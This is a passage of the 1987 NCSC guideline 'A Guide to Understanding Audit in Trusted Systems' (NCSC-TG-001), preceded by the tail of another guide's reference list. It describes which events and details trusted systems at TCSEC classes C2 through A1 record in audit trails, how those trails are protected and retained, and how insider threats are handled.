     System Evaluation Criteria, DOD, DOD 5200.28-STD, 1985.

2.   Brown, R. Leonard, "Configuration Management for Development 
     of a Secure Computer System", ATR-88(3777-12)-1, The        
     Aerospace Corporation, 1987.

3.   Subcommittee on Automated Information System Security,      
     Working Group #3, "Dictionary of Computer Security          
     Terminology", 23 November 1986.

4.   Bersoff, Edward H., Henderson, Vilas D., Siegal, Stanley G., 
     Software Configuration Management, Prentice Hall, Inc.,     
     1980.  

5.   Samaras, Thomas T., Czerwinski, Frank L., Fundamentals of   
     Configuration Management, Wiley-Interscience, 1971.

6.   Sipple, Charles J., Computer Dictionary, Fourth Edition,    
     Howard W. Sams & Co., 1985.

7.   Digital Equipment Corporation, VAX DEC/CMS Reference Manual,
     AA-L372B-TE, Digital Equipment Corporation, 1984.

                                34 

                                              NCSC-TG-001 
                                         Library No. S-228,470 

                          FOREWORD 

This publication, "A Guide to Understanding Audit in Trusted 
Systems," is being issued by the National Computer Security 
Center (NCSC) under the authority of and in accordance with 
Department of Defense (DoD) Directive 5215.1.  The guidelines 
described in this document provide a set of good practices 
related to the use of auditing in automatic data processing 
systems employed for processing classified and other sensitive 
information. Recommendations for revision to this guideline are 
encouraged and will be reviewed biannually by the National 
Computer Security Center through a formal review process.  
Address all proposals for revision through appropriate channels 
to:  

       National Computer Security Center 
       9800 Savage Road 
       Fort George G. Meade, MD  20755-6000  

       Attention: Chief, Computer Security Technical Guidelines 

_________________________________ 
Patrick R. Gallagher, Jr.                     28 July 1987 
Director 
National Computer Security Center  

                                   i 

                          ACKNOWLEDGEMENTS 

Special recognition is extended to James N. Menendez, National 
Computer Security Center (NCSC), as project manager of the 
preparation and production of this document. 

Acknowledgement is also given to the NCSC Product Evaluations 
Team who provided the technical guidance that helped form this 
document and to those members of the computer security community 
who contributed their time and expertise by actively
participating in the review of this document. 

                                   ii 

                          CONTENTS 

FOREWORD ...................................................  i 

ACKNOWLEDGEMENTS ...........................................  ii 

CONTENTS ...................................................  iii

PREFACE .....................................................  v 

1. INTRODUCTION .............................................  1 

    1.1 HISTORY OF THE NATIONAL COMPUTER SECURITY CENTER ....  1 
    1.2 GOAL OF THE NATIONAL COMPUTER SECURITY CENTER .......  1 

2. PURPOSE ..................................................  2 

3. SCOPE ....................................................  3 

4. CONTROL OBJECTIVES .......................................  4 

5. OVERVIEW OF AUDITING PRINCIPLES ..........................  8 

    5.1 PURPOSE OF THE AUDIT MECHANISM.......................  8 
    5.2 USERS OF THE AUDIT MECHANISM.........................  8 
    5.3 ASPECTS OF EFFECTIVE AUDITING .......................  9 

         5.3.1 Identification/Authentication ................  9 
         5.3.2 Administrative ...............................  10
         5.3.3 System Design ................................  10

    5.4 SECURITY OF THE AUDIT ...............................  10 

6. MEETING THE CRITERIA REQUIREMENTS ........................  12

    6.1 THE C2 AUDIT REQUIREMENT ............................  12

         6.1.1 Auditable Events .............................  12
         6.1.2 Auditable Information ........................  12
         6.1.3 Audit Basis ..................................  13

    6.2 THE B1 AUDIT REQUIREMENT ............................  13

         6.2.1 Auditable Events .............................  13
         6.2.2 Auditable Information ........................  13
         6.2.3 Audit Basis ..................................  14

                                  iii 

                          CONTENTS (Continued) 

    6.3 THE B2 AUDIT REQUIREMENT ............................  14

         6.3.1 Auditable Events .............................  14
         6.3.2 Auditable Information ........................  14
         6.3.3 Audit Basis ..................................  14

    6.4 THE B3 AUDIT REQUIREMENT ............................  15

         6.4.1 Auditable Events .............................  15
         6.4.2 Auditable Information ........................  15
         6.4.3 Audit Basis ..................................  15

    6.5 THE A1 AUDIT REQUIREMENT ............................  16

         6.5.1 Auditable Events .............................  16
         6.5.2 Auditable Information ........................  16
         6.5.3 Audit Basis ..................................  16 

7. POSSIBLE IMPLEMENTATION METHODS ..........................  17

    7.1 PRE/POST SELECTION OF AUDITABLE EVENTS ..............  17 

         7.1.1 Pre-Selection ................................  17
         7.1.2 Post-Selection ...............................  18

    7.2 DATA COMPRESSION ....................................  18
    7.3 MULTIPLE AUDIT TRAILS ...............................  19
    7.4 PHYSICAL STORAGE ....................................  19
    7.5 WRITE-ONCE DEVICE ...................................  20
    7.6 FORWARDING AUDIT DATA ...............................  21

8. OTHER TOPICS .............................................  22

    8.1 AUDIT DATA REDUCTION ................................  22
    8.2 AVAILABILITY OF AUDIT DATA ..........................  22
    8.3 AUDIT DATA RETENTION ................................  22
    8.4 TESTING .............................................  23
    8.5 DOCUMENTATION .......................................  23
    8.6 UNAVOIDABLE SECURITY RISKS ..........................  24

         8.6.1 Auditing Administrators/Insider Threat .......  24 
         8.6.2 Data Loss ....................................  25

9. AUDIT SUMMARY ...........................................  26 

GLOSSARY

REFERENCES ..............................................  27 

                          PREFACE                

Throughout this guideline there will be recommendations made that
are not included in the Trusted Computer System Evaluation 
Criteria (the Criteria) as requirements.  Any recommendations 
that are not in the Criteria will be prefaced by the word 
"should," whereas all requirements will be prefaced by the word 
"shall."  It is hoped that this will help to avoid any confusion.

                                   v 
                                                                1

1.   INTRODUCTION 

1.1   History of the National Computer Security Center 

The DoD Computer Security Center (DoDCSC) was established in 
January 1981 for the purpose of expanding on the work started by 
the DoD Security Initiative.  Accordingly, the Director, National
Computer Security Center, has the responsibility for establishing
and publishing standards and guidelines for all areas of computer
security.  In 1985, DoDCSC's name was changed to the National 
Computer Security Center to reflect its responsibility for 
computer security throughout the federal government. 

1.2   Goal of the National Computer Security Center 

The main goal of the National Computer Security Center is to 
encourage the widespread availability of trusted computer 
systems.  In support of that goal a metric was created, the DoD 
Trusted Computer System Evaluation Criteria (the Criteria), 
against which computer systems could be evaluated for security.  
The Criteria was originally published on 15 August 1983 as CSC- 
STD-001-83.  In December 1985 the DoD adopted it, with a few 
changes, as a DoD Standard, DoD 5200.28-STD.  DoD Directive 
5200.28, "Security Requirements for Automatic Data Processing 
(ADP) Systems" has been written to, among other things, require 
the Department of Defense Trusted Computer System Evaluation 
Criteria to be used throughout the DoD.  The Criteria is the 
standard used for evaluating the effectiveness of security 
controls built into ADP systems.  The Criteria is divided into 
four divisions: D, C, B, and A, ordered in a hierarchical manner 
with the highest division (A) being reserved for systems 
providing the best available level of assurance.  Within 
divisions C and B there are a number of subdivisions known as 
classes, which are also ordered in a hierarchical manner to 
represent different levels of security in these classes.   

2.   PURPOSE 

For Criteria classes C2 through A1 the Criteria requires that a 
user's actions be open to scrutiny by means of an audit.  The 
audit process of a secure system is the process of recording, 
examining, and reviewing any or all security-relevant activities 
on the system.  This guideline is intended to discuss issues 
involved in implementing and evaluating an audit mechanism.  The 
purpose of this document is twofold.  It provides guidance to 
manufacturers on how to design and incorporate an effective audit
mechanism into their system, and it provides guidance to 
implementors on how to make effective use of the audit 
                                1

capabilities provided by trusted systems.  This document contains
suggestions as to what information should be recorded on the 
audit trail, how the audit should be conducted, and what 
protective measures should be accorded to the audit resources. 

Any examples in this document are not to be construed as the only
implementations that will satisfy the Criteria requirement.  The 
examples are merely suggestions of appropriate implementations.  
The recommendations in this document are also not to be construed
as supplementary requirements to the Criteria. The Criteria is 
the only metric against which systems are to be evaluated.   

This guideline is part of an on-going program to provide helpful 
guidance on Criteria issues and the features they address. 

3.   SCOPE 

An important security feature of Criteria classes C2 through A1 
is the ability of the ADP system to audit any or all of the 
activities on the system.  This guideline will discuss auditing 
and the features of audit facilities as they apply to computer 
systems and products that are being built with the intention of 
meeting the requirements of the Criteria. 

                                2 

4.  CONTROL OBJECTIVES

The Trusted Computer System Evaluation Criteria gives the 
following as the Accountability Control Objective: 

    "Systems that are used to process or handle classified or 
     other sensitive information must assure individual          
     accountability whenever either a mandatory or               
     discretionary security policy is invoked.  Furthermore, to  
     assure accountability the capability must exist for an 
     authorized and competent agent to access and evaluate       
     accountability information by a secure means, within a      
     reasonable amount of time and without undue difficulty."(1) 

The Accountability Control Objective as it relates to auditing 
leads to the following control objective for auditing: 

    "A trusted computer system must provide authorized personnel 
     with the ability to audit any action that can potentially  
     cause access to, generation of, or effect the release 
     of classified or sensitive information.  The audit 
     data will be selectively acquired based on the auditing 
     needs of a particular installation and/or application.      
     However, there must be sufficient granularity in the audit  
     data to support tracing the auditable events to a specific  
     individual (or process) who has taken the actions or on     
     whose behalf the actions were taken."(1)   

                                3 

5.   OVERVIEW OF AUDITING PRINCIPLES 

Audit trails are used to detect and deter penetration of a
computer system and to reveal usage that identifies misuse.  At
the discretion of the auditor, audit trails may be limited to
specific events or may encompass all of the activities on a
system.  Although not required by the TCSEC, it should be
possible for the target of the audit mechanism to be either a
subject or an object.  That is to say, the audit mechanism should
be capable of monitoring every time John accessed the system as
well as every time the nuclear reactor file was accessed; and
likewise every time John accessed the nuclear reactor file. 

5.1   Purpose of the Audit Mechanism 

The audit mechanism of a computer system has five important
security goals.  First, the audit mechanism must "allow the
review of patterns of access to individual objects, access
histories of specific processes and individuals, and the use of
the various protection mechanisms supported by the system and
their effectiveness."(2)  Second, the audit mechanism must allow
discovery of both users' and outsiders' repeated attempts to
bypass the protection mechanisms.  Third, the audit mechanism
must allow discovery of any use of privileges that may occur when
a user assumes a functionality with privileges greater than his
or her own, i.e., programmer to administrator.  In this case
there may be no bypass of security controls but nevertheless a
violation is made possible.  Fourth, the audit mechanism must act
as a deterrent against perpetrators' habitual attempts to bypass
the system protection mechanisms.  However, to act as a
deterrent, the perpetrator must be aware of the audit mechanism's
existence and its active use to detect any attempts to bypass
system protection mechanisms.  The fifth goal of the audit
mechanism is to supply "an additional form of user assurance that
attempts to bypass the protection mechanisms are recorded and
discovered."(2)  Even if the attempt to bypass the protection
mechanism is successful, the audit trail will still provide
assurance by its ability to aid in assessing the damage done by
the violation, thus improving the system's ability to control the
damage. 

5.2.  Users of the Audit Mechanism 

"The users of the audit mechanism can be divided into two groups. 
The first group consists of the auditor, who is an individual
with administrative duties, who selects the events to be audited
on the system, sets up the audit flags which enable the recording

                                4

of those events, and analyzes the trail of audit events."(2)  In
some systems the duties of the auditor may be encompassed in the
duties of the system security administrator.  Also, at the lower
classes, the auditor role may be performed by the system
administrator.  This document will refer to the person
responsible for auditing as the system security administrator,
although it is understood that the auditing guidelines may apply
to system administrators and/or system security administrators
and/or a separate auditor in some ADP systems.   

"The second group of users of the audit mechanism consists of the
system users themselves; this group includes the administrators,
the operators, the system programmers, and all other users.  They
are considered users of the audit mechanism not only because
they, and their programs, generate audit events,"(2) but because
they must understand that the audit mechanism exists and what
impact it has on them.  This is important because otherwise the
user deterrence and user assurance goals of the audit mechanism
cannot be achieved.    

5.3  Aspects of Effective Auditing 

5.3.1.  Identification/Authentication 

 Logging in on a system normally requires that a user enter the 
specified form of identification (e.g., login ID, magnetic strip) 
and a password (or some other mechanism) for authentication. 
Whether this information is valid or invalid, the execution of
the login procedure is an auditable event and the identification
entered may be considered to be auditable information.  It is
recommended that authentication information, such as passwords,
not be forwarded to the audit trail.  In the event that the
identification entered is not recognized as being valid, the
system should also omit this information from the audit trail. 
The reason for this is that a user may have entered a password
when the system expected a login ID.  If the information had been
written to the audit trail, it would compromise the password and
the security of the user. 

There are, however, environments where the risk involved in 
recording invalid identification information is reduced.  In
systems that support formatted terminals, the likelihood of
password entry in the identification field is markedly reduced,
hence the recording of identification information would pose no
major threat.  The benefit of recording the identification
information is that break-in attempts would be easier to detect
and identifying the perpetrator would also be assisted.  The 

                                 5

information gathered here may be necessary for any legal 
prosecution that may follow a security  violation.    

5.3.2  Administrative 

All systems rated at class C2 or higher shall have audit 
capabilities and personnel designated as responsible for the
audit procedures.  For the C2 and B1 classes, the duties of the
system operators could encompass all functions including those of
the auditor.  Starting at the B2 class, there is a requirement
for the TCB to support separate operator and administrator
functions.  In addition, at the B3 class and above, there is a
requirement to identify the system security administrator
functions.  When one assumes the system security administrator
role on the system, it shall be after taking distinct auditable
action, e.g., login procedure.  When one with the privilege of
assuming the role is on the system, the act of assuming that role
shall also be an auditable event. 

5.3.3   System Design 

The system design should include a mechanism to invoke the audit 
function at the request of the system security administrator.  A 
mechanism should also be included to determine if the event is to
be selected for inclusion as an audit trail entry.  If
pre-selection of events is not implemented, then all auditable
events should be forwarded to the audit trail.  The Criteria
requirement for the administrator to be able to select events
based on user identity and/or object security classification must
still be able to be satisfied.  This requirement can be met by
allowing post-selection of events through the use of queries. 
Whatever reduction tool is used to analyze the audit trail shall
be provided by the vendor.  

5.4   Security of the Audit 

Audit trail software, as well as the audit trail itself, should
be protected by the Trusted Computing Base and should be subject
to strict access controls.  The security requirements of the
audit mechanism are the following: 

(1)  The event recording mechanism shall be part of the TCB and  
     shall be protected from unauthorized modification or        
     circumvention. 

(2)  The audit trail itself shall be protected by the TCB from   

                                 6

     unauthorized access (i.e., only the audit personnel may     
     access the audit trail).  The audit trail shall also be     
     protected from unauthorized modification.  

(3)  The audit-event enabling/disabling mechanism shall be part  
     of the TCB and shall remain inaccessible to the unauthorized 
     users.(2)  

At a minimum, the data on the audit trail should be considered to
be sensitive, and the audit trail itself shall be considered to
be as sensitive as the most sensitive data contained in the
system. 

When the medium containing the audit trail is physically removed 
from the ADP system, the medium should be accorded the physical 
protection required for the highest sensitivity level of data 
contained in the system. 

                                 7 

6.   MEETING THE CRITERIA REQUIREMENTS 

This section of the guideline will discuss the audit requirements
in the Criteria and will present a number of additional 
recommendations.  There are four levels of audit requirements. 
The first level is at the C2 Criteria class and the requirements 
continue evolving through the B3 Criteria class.   At each of
these levels, the guideline will list some of the events which
should be auditable, what information should be on the audit
trail, and on what basis events may be selected to be audited. 
All of the requirements will be prefaced by the word "shall," and
any additional recommendations will be prefaced by the word
"should." 

6.1   The C2 Audit Requirement 

6.1.1   Auditable Events 

The following events shall be subject to audit at the C2 class:  

   * Use of identification and authentication mechanisms 

   * Introduction of objects into a user's address space  

   * Deletion of objects from a user's address space 

   * Actions taken by computer operators and system              
     administrators and/or system security administrators    

   * All security-relevant events (as defined in Section 5 of    
     this guideline) 

   * Production of printed output 

6.1.2   Auditable Information 

The following information shall be recorded on the audit trail at
the C2 class:  

   * Date and time of the event 

   * The unique identifier on whose behalf the subject generating 
     the event was operating 

   * Type of event 

   * Success or failure of the event 

                                8

   * Origin of the request (e.g., terminal ID) for               
     identification/authentication events 

   * Name of object introduced, accessed, or deleted from a      
    user's address space 

   * Description of modifications made by the system             
     administrator to the user/system security databases   

6.1.3   Audit Basis 

At the C2 level, the ADP System Administrator shall be able to
audit based on individual identity. 

The ADP System Administrator should also be able to audit based
on object identity. 

6.2   The B1 Audit Requirement 

6.2.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B1 class: 

   * Any override of human readable output markings (including   
     overwrite of sensitivity label markings and the turning off 
     of labelling capabilities) on paged, hard-copy output       
   devices 

   * Change of designation (single-level to/from multi-level) of 
     any communication channel or I/O device 

   * Change of sensitivity level(s) associated with a            
   single-level communication channel or I/O device 

   * Change of range designation of any multi-level communication 
     channel or I/O device  

6.2.2   Auditable Information 

The Criteria specifically adds the following to the list of 
information that shall be recorded on the audit trail at the B1  
class: 

   * Security level of the object 

                                 9 

The following information should also be recorded on the audit
trail at the B1 class: 

   * Subject sensitivity level  

6.2.3   Audit Basis 

In addition to previous selection criteria, at the B1 level the 
Criteria specifically requires that the ADP System Administrator 
shall be able to audit based on individual identity and/or object
security level. 

6.3   The B2 Audit Requirement 

6.3.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B2 class: 

   * Events that may exercise covert storage channels  

6.3.2   Auditable Information 

No new requirements have been added at the B2 class. 

6.3.3   Audit Basis 

In addition to previous selection criteria, at the B2 level the 
Criteria specifically requires that "the TCB shall be able to
audit the identified events that may be used in the exploitation
of covert storage channels."  The Trusted Computing Base shall
audit covert storage channels that exceed ten bits per second.(1) 

The Trusted Computing Base should also provide the capability to 
audit the use of covert storage mechanisms with bandwidths that
may exceed a rate of one bit in ten seconds.  

6.4   The B3 Audit Requirement 

6.4.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B3 class: 

   * Events that may indicate an imminent violation of the 

                                10

     system's security policy (e.g., exercise covert timing      
     channels) 

6.4.2   Auditable Information 

No new requirements have been added at the B3 class. 

6.4.3   Audit Basis 

In addition to previous selection criteria, at the B3 level the  
Criteria specifically requires that "the TCB shall contain a 
mechanism that is able to monitor the occurrence or accumulation
of security auditable events that may indicate an imminent
violation of security policy.  This mechanism shall be able to
immediately notify the system security administrator when
thresholds are exceeded and, if the occurrence or accumulation of
these security-relevant events continues, the system shall take
the least disruptive action to terminate the event."(1)     

Events that would indicate an imminent security violation would 
include events that utilize covert timing channels that may
exceed a rate of ten bits per second and any repeated
unsuccessful login attempts.   

Being able to immediately notify the system security
administrator when thresholds are exceeded means that the
mechanism shall be able to recognize, report, and respond to a
violation of the security policy more rapidly than required at
lower levels of the Criteria, which usually only requires the
System Security Administrator to review an audit trail at some
time after the event.  Notification of the violation "should be
at the same priority as any other TCB message to an operator."(5) 

"If the occurrence or accumulation of these security-relevant
events continues, the system shall take the least disruptive
action to terminate the event."(1)  These actions may include
locking the terminal of the user who is causing the event or
terminating the suspect's process(es).  In general, the least
disruptive action is application dependent and there is no
requirement to demonstrate that the action is the least
disruptive of all possible actions.  Any action which terminates
the event is acceptable, but halting the system should be the
last resort.   

                                11

7.5   The A1 Audit Requirement 

7.5.1   Auditable Events 

No new requirements have been added at the A1 class. 

7.5.2   Auditable Information 

No new requirements have been added at the A1 class. 

7.5.3   Audit Basis 

No new requirements have been added at the A1 class. 

                                12 

7.   POSSIBLE IMPLEMENTATION METHODS 

The techniques for implementing the audit requirements will vary 
from system to system depending upon the characteristics of the 
software, firmware, and hardware involved and any optional
features that are to be available.  Technologically advanced
techniques that are available should be used to the best
advantage in the system design to provide the requisite security
as well as cost-effectiveness and performance.  

7.1   Pre/Post Selection of Auditable Events 

There is a requirement at classes C2 and above that all security-
relevant events be auditable.  However, these events may or may
not always be recorded on the audit trail.  Options that may be 
exercised in selecting which events should be audited include a
pre-selection feature and a post-selection feature.  A system may
choose to implement both options, a pre-selection option only, or
a post-selection option only.  

If a system developer chooses not to implement a general pre/post
selection option, there is still a requirement to allow the 
administrator to selectively audit the actions of specified users
for all Criteria classes.  Starting at the B1 class, the 
administrator shall also be able to audit based on object
security level. 

There should be options to allow selection by either individuals
or groups of users.  For example, the administrator may select
events related to a specified individual or select events related
to individuals included in a specified group.  Also, the
administrator may specify that events related to the audit file
be selected or, at classes B1 and above, that accesses to objects
with a given sensitivity level, such as Top Secret, be selected. 

7.1.1   Pre-Selection 

For each auditable event the TCB should contain a mechanism to 
indicate if the event is to be recorded on the audit trail.  The 
system security administrator or designee shall be the only
person authorized to select the events to be recorded. 
Pre-selection may be by user(s) identity, and at the B1 class and
above, pre-selection may also be possible by object security
level.  Although the system security administrator shall be
authorized to select which events are to be recorded, the system
security administrator should not be able to exclude himself from
being audited. 

                                13

Although it would not be recommended, the system security  
administrator may have the capability to select that no events be
recorded regardless of the Criteria requirements.  The intention 
here is to provide flexibility.  The purpose of designing audit 
features into a system is not to impose the Criteria on users
that may not want it, but merely to provide the capability to
implement the requirements. 

A disadvantage of pre-selection is that it is very hard to
predict what events may be of security-relevant interest at a
future date.  There is always the possibility that events not
pre-selected could one day become security-relevant, and the
potential loss from not auditing these events would be impossible
to determine. 

The advantage of pre-selection could possibly be better
performance as a result of not auditing all the events on the
system. 

7.1.2   Post-Selection 

If the post-selection option to select only specified events from
an existing audit trail is implemented, again, only authorized 
personnel shall be able to make this selection.  Inclusion of
this option requires that the system should have trusted
facilities (as described in section 9.1) to accept
query/retrieval requests, to expand any compressed data, and to
output the requested data. 

The main advantage of post-selection is that information that may
prove useful in the future is already recorded on an audit trail
and may be queried at any time. 

The disadvantage involved in post-selection could possibly be 
degraded performance due to the writing and storing of what could
possibly be a very large audit trail. 

7.2   Data Compression 

"Since a system that selects all events to be audited may
generate a large amount of data, it may be necessary to encode
the data to conserve space and minimize the processor time
required" to record the audit records.(3)  If the audit trail is
encoded, a complementary mechanism must be included to decode the
data when required.  The decoding of the audit trail may be done
as a preprocess before the audit records are accessed by the
database or as a postprocess after a relevant record has been 

                                14

found.  Such decoding is necessary to present the data in an 
understandable form both at the administrators terminal and on
batch reports.  The cost of compressing the audit trail would be
the time required for the compression and expansion processes. 
The benefit of compressing data is the savings in storage and the
savings in time to write the records to the audit trail.  

7.3   Multiple Audit Trails 

All events included on the audit trail may be written as part of
the same audit trail, but some systems may prefer to have several
distinct audit trails, e.g., one would be for "user" events, one
for "operator" events, and one for "system security
administrator" events.  This would result in several smaller
trails for subsequent analysis.  In some cases, however, it may
be necessary to combine the information from the trails when
questionable events occur in order to obtain a composite of the
sequence of events as they occurred.  In cases where there are
multiple audit trails, it is preferred that there be some
accurate, or at least synchronized, time stamps across the
multiple logs.    

Although the preference for several distinct audit trails may be 
present, it is important to note that it is often more useful
that the TCB be able to present all audit data as one
comprehensive audit trail. 

7.4   Physical Storage 

A factor to consider in the selection of the medium to be used
for the audit trail would be the expected usage of the system. 
The I/O volume for a system with few users executing few
applications would be quite different from that of a large system
with a multitude of users performing a variety of applications. 
In any case, however, the system should notify the system
operator or administrator when the audit trail medium is
approaching its storage capacity.  Adequate advance notification
to the operator is especially necessary if human intervention is
required.   

If the audit trail storage medium is saturated before it is 
replaced, the operating system shall detect this and take some 
appropriate action such as: 

1.  Notifying the operator that the medium is "full" and action  
    is necessary.  The system should then stop and require       
    rebooting.  Although a valid option, this action creates a   

                                15

    severe threat of denial-of-service attacks. 

2.  Storing the current audit records on a temporary medium with 
    the intention of later migration to the normal operational   
    medium, thus allowing auditing to continue.  This temporary  
    storage medium should be afforded the same protection as the 
    regular audit storage medium in order to prevent any attempts 
    to tamper with it. 

3.  Delaying input of new actions and/or slowing down current    
    operations to prevent any action that requires use of the    
    audit mechanism. 

4.  Stopping until the administrative personnel make more space  
    available for writing audit records.    

5.  Stopping auditing entirely as a result of a decision by the  
    system security administrator. 

Any action that is taken in response to storage overflow shall be 
audited.  There is, however, a case in which the action taken may
not be audited that deserves mention.  It is possible to have the
system security administrator's decisions embedded in the system 
logic.  Such pre-programmed choices, embedded in the system
logic, may be triggered automatically and this action may not be
audited. 

Still another consideration is the speed at which the medium 
operates.  It should be able to accommodate the "worst case" 
condition such as when there are a large number of users on the 
system and all auditable events are to be recorded.  This worst
case rate should be estimated during the system design phase and
(when possible) suitable hardware should be selected for this
purpose. 

Regardless of how the system handles audit trail overflow, there 
must be a way to archive all of the audit data.  

7.5   Write-Once Device 

For the lower Criteria classes (e.g., C2, B1) the audit trail may
be the major tool used in detecting security compromises. 
Implicit in this is that the audit resources should provide the
maximum protection possible.  One technique that may be employed
to protect the audit trail is to record it on a mechanism
designed to be a write-only device.  Other choices would be to
set the designated device to write-once mode by disabling the 

                                16

read mechanism.  This method could prevent an attacker from
erasing or modifying the data already written on the audit trail
because the attacker will not be able to go back and read or find
the data that he or she wishes to modify.   

If a hardware device is available that permits only the writing
of data on a medium, modification of data already recorded would
be quite difficult.  Spurious messages could be written, but to
locate and modify an already recorded message would be difficult. 
Use of a write-once device does not prevent a penetrator from
modifying audit resources in memory, including any buffers, in
the current audit trail. 

If a write-once device is used to record the audit trail, the
medium can later be switched to a compatible read device to allow 
authorized personnel to analyze the information on the audit
trail in order to detect any attempts to penetrate the system. 
If a penetrator modified the audit software to prevent writing
records on the audit trail, the absence of data during an
extended period of time would indicate a possible security
compromise.  The disadvantage of using a write-once device is
that it necessitates a delay before the audit trail is available
for analysis by the administrator.  This may be offset by
allowing the system security administrator to review the audit
trail in real-time by getting copies of all audit records on
their way to the device. 

7.6   Forwarding Audit Data 

If the facilities are available, another method of protecting the
audit trail would be to forward it to a dedicated processor.  The
audit trail should then be more readily available for analysis by
the system security administrator.  

                                17 

8.  OTHER TOPICS 

8.1   Audit Data Reduction 

Depending upon the amount of activity on a system and the audit 
selection process used, the audit trail size may vary.  It is a
safe assumption though, that the audit trail would grow to sizes
that would necessitate some form of audit data reduction.  The
data reduction tool would most likely be a batch program that
would interface to the system security administrator.  This batch
run could be a combination of database query language and a
report generator with the input being a standardized audit file. 

Although they are not necessarily part of the TCB, the audit 
reduction tools should be maintained under the same configuration
control system as the remainder of the system. 

8.2  Availability of Audit Data 

In standard data processing, audit information is recorded as it 
occurs.  Although most information is not required to be
immediately available for real-time analysis, the system security
administrator should have the capability to retreive audit
information within minutes of its recording.  The delay between
recording audit information and making it available for analysis
should be minimal, in the range of several minutes.   

For events which do require immediate attention, at the B3 class
and above, an alert shall be sent out to the system security 
administrator.  In systems that store the audit trail in a
buffer, the system security administrator should have the
capability to cause the buffer to be written out.  Regarding
real-time alarms, where they are sent is system dependent.   

8.3  Audit Data Retention 

The exact period of time required for retaining the audit trail  
is site dependent and should be documented in the site's
operating procedures manual.  When trying to arrive at the
optimum time for audit trail retention, any time restrictions on
the storage medium should be considered.  The storage medium used
must be able to reliably retain the audit data for the amount of
time required by the site.     

The audit trail should be reviewed at least once a week.  It is
very possible that once a week may be too long to wait to review 

                                18

the audit trail.  Depending on the amount of audit data expected 
by the system, this parameter should be adjusted accordingly. 
The recommended time in between audit trail reviews should be
documented in the Trusted Facility Manual.      

8.4  Testing 

The audit resources, along with all other resources protected by
the TCB, have increasing assurance requirements at each higher
Criteria class.  For the lower classes, an audit trail would be a
major factor in detecting penetration attempts.  Unfortunately,
at these lower classes, the audit resources are more susceptible
to penetration and corruption.  "The TCB must provide some
assurance that the data will still be there when the
administrator tries to use it."(3)  The testing requirement
recognizes the vulnerability of the audit trail, and starting
with the C2 class, shall include a search for obvious flaws that
would corrupt or destroy the audit trail.  If the audit trail is
corrupted or destroyed, the existence of such flaws indicates
that the system can be penetrated.  Testing should also be
performed to uncover any ways of circumventing the audit
mechanisms.  The "flaws found in testing may be neutralized in 
any of a number of ways.  One way available to the system
designer is to audit all uses of the mechanism in which the flaw
is found and to log such events."(3)  An attempt should be made
to remove the flaw.   

At class B2 and above, it is required that all detected flaws
shall be corrected or else a lower rating will be given.  If
during testing the audit trail appears valid, analysis of this
data can verify that it does or does not accurately reflect the
events that should be included on the audit trail.  Even though
system assurances may increase at the higher classes, the audit
trail is still an effective tool during the testing phase as well
as operationally in detecting actual or potential security
compromises. 

8.5  Documentation  

Starting at the C2 class, documentation concerning the audit 
requirements shall be contained in the Trusted Facility Manual.  
The Trusted Facility Manual shall explain the procedures to
record, examine, and maintain audit files.  It shall detail the
audit record structure for each type of audit event, and should
include what each field is and what the size of the field is. 

The Trusted Facility Manual shall also include a complete  

                                19

description of the audit mechanism interface, how it should be
used, its default settings, cautions about the trade-offs
involved in using various configurations and capabilities, and
how to set up and run the system such that the audit data is 
afforded appropriate protection. 

If audit events can be pre- or post-selected, the manual should
also describe the tools and mechanisms available and how they are
to be used. 

8.6  Unavoidable Security Risks 

There are certain risks contained in the audit process that exist
simply because there is no way to prevent these events from ever 
occurring.  Because there are certain unpredictable factors  
involved in auditing, i.e., man, nature, etc., the audit
mechanism may never be one hundred per cent reliable.  Preventive
measures may be taken to minimize the likelihood of any of these
factors adversely affecting the security provided by the audit
mechanism, but no audit mechanism will ever be risk free.      

8.6.1   Auditing Administrators/Insider Threat 

Even with auditing mechanisms in place to detect and deter
security violations, the threat of the perpetrator actually being
the system security administrator or someone involved with the
system security design will always be present.  It is quite
possible that the system security administrator of a secure
system could stop the auditing of activities while entering the
system and corrupting files for personal benefit.  These
authorized personnel, who may also have access to identification
and authentication information, could also choose to enter the
system disguised as another user in order to commit crimes under
a false identity.  

Management should be aware of this risk and should be certain to 
exercise discretion when selecting the system security 
administrator.  The person who is to be selected for a trusted 
position, such as the system security administrator, should be 
subject to a background check before being granted the privileges
that could one day be used against the employer.   

The system security administrator could also be watched to ensure
that there are no unexplained variances in normal duties.  Any 
deviation from the norm of operations may indicate that a
violation of security has occurred or is about to occur. 

                                20

An additional security measure to control this insider threat is
to ensure that the system administrator and the person
responsible for the audit are two different people.  "The
separation of the auditor's functions, databases, and access
privileges from those of the system administrator is an important
application of the separation of privilege and least privilege 
principles.  Should such a separation not be performed, and
should the administrator be allowed to undertake auditor
functions or vice-versa, the entire security function would
become the responsibility of a single, unaccountable
individual."(2) 

Another alternative may be to employ separate auditor roles. 
Such a situation may give one person the authority to turn off
the audit mechanism, while another person may have the authority
to turn it back on.  In this case no individual would be able to
turn off the audit mechanism, compromise the system, and then
turn it back on. 

8.6.2   Data Loss 

Although the audit software and hardware are reliable security  
mechanisms, they are not infallible.  They, like the rest of the 
system, are dependent upon constant supplies of power and are  
readily subject to interruption due to mechanical or power
failures.  Their failure can cause the loss or destruction of
valuable audit data.  The system security administrator should be
aware of this risk and should establish some procedure that would
ensure that the audit trail is preserved somewhere.  The system
security administrator should duplicate the audit trail on a
removable medium at certain points in time to minimize the data
loss in the event of a system failure.  The Trusted Facility
Manual should include what the possibilities and nature of loss
exposure are, and how the data may be recovered in the event that
a catastrophe does occur.  

If a mechanical or power failure occurs, the system security 
administrator should ensure that audit mechanisms still function 
properly after system recovery.  For example, any auditing
mechanism options pre-selected before the system malfunction must
still be the ones in operation after the system recovery.   

                                21 

9.  AUDIT SUMMARY 

For classes C2 and above, it is required that the TCB "be able to
create, maintain, and protect from modification or unauthorized 
access or destruction an audit trail of accesses to the objects
it protects."(1)  The audit trail plays a key role in performing
damage assessment in the case of a corrupted system.   

The audit trail shall keep track of all security-relevant events 
such as the use of identification and authentication mechanisms, 
introduction of objects into a user's address space, deletion of 
objects from the system, system administrator actions, and any
other events that attempt to violate the security policy of the
system.  The option should exist that either all activities be
audited or that the system security administrator select the
events to be audited.  If it is decided that all activities
should be audited, there are overhead factors to be considered. 
The storage space needed for a total audit would generally
require more operator maintenance to prevent any loss of data and
to provide adequate protection.  A requirement exists that
authorized personnel shall be able to read all events recorded on
the audit trail.  Analysis of the total audit trail would be both
